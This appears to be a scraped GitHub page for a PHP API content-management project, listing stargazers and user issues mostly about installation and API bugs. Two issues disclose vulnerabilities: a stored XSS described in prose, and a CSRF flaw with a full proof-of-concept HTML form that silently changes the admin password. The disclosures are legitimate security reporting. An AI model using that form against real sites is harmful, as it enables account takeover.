5ime / api-admin Goto Github PK

View Code? Open in Web Editor NEW

404.0 404.0 131.0 26.99 MB

API 网站内容管理系统内置 20+ API 接口

License: MIT License

PHP 80.80% HTML 5.71% CSS 7.81% JavaScript 3.83% PLpgSQL 0.25% Smarty 1.60%

api cms php

api-admin's Introduction

Hi I Am I 👋

📫 How to reach me:

My home page Index
Read more about my Blog
Talk with me by Telegram

api-admin's People

Contributors

Stargazers

Watchers

Forkers

xuziqiangnb steadyhua liuzhuoyu mainblog fatexiyi devin-hjc k-vx coolxiyi akrongl 40740 lgp1999 luwa-a whitestorys ba0k1q liwz fanxy121 xiaotang2022 chenyfan-tester dwtstudio qdchenyixuan dogwars poinanodesu aika107 xiaoicx core888 wuanzuo lxalano imdong dd0072 ssrss 2949848385 mo33999 ansar-786 leigangblog jnightlee xingyaox chaos-zhu donywan ye13jian feiyangbeyond baikele slacrey jewelbao gaohuazi lonewolfyx yang-xiansen qhgqingxuan cysk003 luawei1 gimgoo aixiu jack1895 zhao336ok free-project theatergong 5536086 xiaohai921 delfws ting8 cnstephen zqqq shuxiaokai critts yliteraturepro jinjiuling nosoxo shoting-star wanghongice guyingd aspbyxx foreverglory zidingz falost cfcx hackerzhangg hot178 chunyu-zhou nuomi100 kg-keguan wsadczh xcdha 2664097453 mdai52 n1wd jiang-niao yashrio chengfengkj newton-miku xswvfr lyhxx zxhans 17768284893 liuqiaomin xkipcom usuixin owendrost btjson bingdian-s lusins gwcctv

api-admin's Issues

安装完运行报错啊

syntax error, unexpected '<<' (T_SL), expecting end of file in

测试可用，数据好像是旧的，可以把演示站的数据库分享一下吗？

提示 “最新请求数据获取失败，请检查日志文件是否可以被访问！”

已按要求在站点信息中填写日志路径，但是刷新后依然提示“最新请求数据获取失败，请检查日志文件是否可以被访问！”

你好！请问一下二维码生成和解析开源吗？

总调用数无法显示呀

增添数据出错

v1.2版本，可以修改已存在的数据
但无法增加数据，后台增添总提示
页面错误！请稍后再试～
ThinkPHP V5.0.24 { 十年磨一剑-为API开发设计的高性能框架 }
环境：Linux CentOS 8.2.2004 + Nginx 1.18.0 + PHP7.3 + MySQL 5.7.31

抖音图集接口201

带特殊字符的QQ昵称无法正常获取

请求

https://tenapi.cn/qqname/?qq=492927960

响应

{
    "code": 200,
    "imgurl": "https://q2.qlogo.cn/headimg_dl?dst_uin=492927960&spec=100",
    "name": "方"
}

实际昵称

666

有获取QQskey接口嘛

安装成功了，但是为什么访问域名会页面错误？

index.php

123

A stored XSS vulnerability exists in the published article

In 'Article Publishing', write an XSS payload, and a pop-up window will appear directly due to the preview function.
After publishing the article, come to the front desk of the website, click the article just released, and the XSS pop-up window will appear.

根目录index.php多写了一个“.”报错

符号被我吃掉惹

https://docs.tenapi.cn/img.html#%E8%B0%83%E7%94%A8%E6%95%88%E6%9E%9C

少了个"="

后台提交新API接口失败

如题，一直卡着mdui转圈圈,NetWork显示如图


跳转404但是返回500
这是什么情况？

There is a CSRF vulnerability in the personal settings

First, log in to the background, click Personal Settings. There is no captcha here and there is no requirement to verify the old password, try CSRF.
Then, feel free to enter a password, for example '777777', click submit, and grab the packet in Burpsuite.

Use the packet of the second step to generate a CSRF POC, and then visit the CSRF page in the same browser.
CSRF POC

 <html>
     <!-- CSRF PoC - generated by Burp Suite Professional -->
     <body>
     <script>history.pushState('', '', '/')</script>
         <form action="http://192.168.190.137/admin/index/editUserinfo" method="POST">
             <input type="hidden" name="username" value="admin" />
             <input type="hidden" name="password" value="777777" />
             <input type="hidden" name="email" value="123&#64;qq&#46;com" />
             <input type="submit" value="Submit request" />
         </form>
     </body>
 </html>